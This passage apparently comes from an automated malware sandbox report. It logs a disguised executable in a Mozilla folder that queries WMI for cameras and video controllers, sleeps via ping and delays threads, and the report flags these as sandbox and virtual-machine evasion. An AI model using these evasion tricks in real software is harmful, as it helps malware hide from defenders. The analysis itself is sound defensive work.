                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Uses ping.exe to sleep
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost Jump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeMemory allocated: 1620000 memory reserve | memory write watchJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeMemory allocated: 1B280000 memory reserve | memory write watchJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeMemory allocated: F90000 memory reserve | memory write watchJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeMemory allocated: 1A9E0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF848F69089 sldt word ptr [eax]12_2_00007FF848F69089
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 599890Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 599547Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 300000Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 598985Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 598485Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 597985Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 597810Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 597391Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 596844Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 596516Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 596031Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 595733Jump to behavior
